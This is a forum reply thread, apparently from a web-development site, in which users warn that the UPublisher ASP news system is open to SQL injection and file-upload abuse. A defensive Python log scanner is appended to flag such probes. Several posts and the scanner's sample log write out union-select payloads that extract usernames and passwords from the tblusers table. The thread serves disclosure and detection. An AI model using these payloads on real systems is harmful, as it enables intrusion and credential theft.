Replies

UPublisher | ASP News Publishing System for UD

web not working
September 14, 2001 by Jarek Bucholc
I found the external site is not working.
WAS Not Working, Is Now
September 14, 2001 by Super Freaker

Hey Jarek,

One of the problems with having a live demo is that people often feel inclined to try and break it and/or fill it with juvenile comments.

It should be all fixed now.

Shannon
team macromedia ultradev

RE: Superfreaker UPublisher SECURITY FLAWS
November 21, 2006 by West Chase

Please avoid using their UPublisher product .. and likely ALL superfreaker (a.k.a. superf**ked) products.

Do a Google search on "UPublisher exploit" to see the reason why.

http://www.milw0rm.com/exploits/2765

###http://[target]/[path]//viewarticle.asp?ID=[SQL]

Example:

\viewarticle.asp?ID=-1%20union%20select%200,password,username,0,0,0,0%20from%20tblusers
--- OR ---
\viewarticle.asp?ID=-1%20union%20select%200,0,username,password,0,0,0,0,0%20from%20tblusers

RE: RE: Superfreaker UPublisher SECURITY FLAWS
November 21, 2006 by West Chase

LOL - even Superfreaker's DEMO page was hacked:

http://www.superfreaker.com/UPublisher/demo/

RE: Superfreaker UPublisher SECURITY FLAWS
November 21, 2006 by West Chase

If your copy of UPublisher has been hacked, be CERTAIN to review / clean the uploads folder at:  /images/story_images/

In our case, the hacker was able to upload entire HTML pages ... and then reference them from their browser since they now knew the full URL to their HTML form!

Damn you, StupidFreaker

RE: Superfreaker UPublisher SECURITY FLAWS
November 26, 2006 by West Chase

In regard to the many articles on Google:

http://www.google.com/search?hl=en&q=upublisher+exploit 

Superfreaker's "UPublisher" exploit is NOT LIMITED to their "viewarticle.asp" script.

In fact, most of the product is vulnerable to SQL Injection attacks. Some other pages are "index.asp" and "preferences.asp".

Some other UPublisher scripts that CAN be hacked using the SAME METHOD you described above:

sendarticle.asp
printarticle.asp
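
For anyone checking whether their install was probed, here is an added example (not part of the thread and not Superfreaker's code): a Python pass over web-server logs that flags requests to the scripts named above carrying a non-numeric ID or SQL keywords, and non-image files fetched from /images/story_images/. The log field order, the image-extension list and the integer-ID rule are assumptions, and the sample log lines are constructed.

```python
import re
from urllib.parse import parse_qsl

# Scripts named in the thread as injectable; uploads folder from the thread.
SCRIPTS = {"viewarticle.asp", "sendarticle.asp", "printarticle.asp",
           "index.asp", "preferences.asp"}
UPLOAD_DIR = "/images/story_images/"
IMAGE_EXT = (".gif", ".jpg", ".jpeg", ".png")  # assumption: only images belong there
SQL_RE = re.compile(r"\b(union|select|insert|update|delete|drop)\b|--|;|'", re.I)

# Constructed sample log; assumed fields: date time c-ip method uri-stem uri-query status
SAMPLE_LOG = """\
2006-11-20 10:01:02 192.0.2.10 GET /news/viewarticle.asp ID=42 200
2006-11-20 10:03:17 192.0.2.77 GET /news/viewarticle.asp ID=-1%20union%20select%200,password,username,0,0,0,0%20from%20tblusers 200
2006-11-20 10:09:03 192.0.2.77 GET /news/images/story_images/form.html - 200
2006-11-20 10:09:30 192.0.2.10 GET /news/images/story_images/logo.gif - 200
"""

def classify(line):
    """Return a finding for one log line, or None if it looks clean."""
    parts = line.split()
    if line.startswith("#") or len(parts) < 7:
        return None
    stem, query = parts[4].lower(), parts[5]
    name = stem.rsplit("/", 1)[-1]
    if UPLOAD_DIR in stem and not name.endswith(IMAGE_EXT):
        return "non-image file requested from uploads folder"
    if name not in SCRIPTS or query == "-":
        return None
    for key, value in parse_qsl(query, keep_blank_values=True):
        # Assumption: ID is an integer article key, so anything else is suspect.
        if key.lower() == "id" and not re.fullmatch(r"\d+", value):
            return "non-numeric ID parameter"
        if SQL_RE.search(value):
            return "SQL syntax in parameter " + key
    return None

def scan(log_text):
    """Return (line_number, finding) pairs for every suspicious line."""
    hits = []
    for n, line in enumerate(log_text.splitlines(), 1):
        finding = classify(line)
        if finding:
            hits.append((n, finding))
    return hits

if __name__ == "__main__":
    for n, finding in scan(SAMPLE_LOG):
        print(n, finding)
```

A hit on the uploads folder is a prompt to inspect that file on disk, since the log only shows that it was requested.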
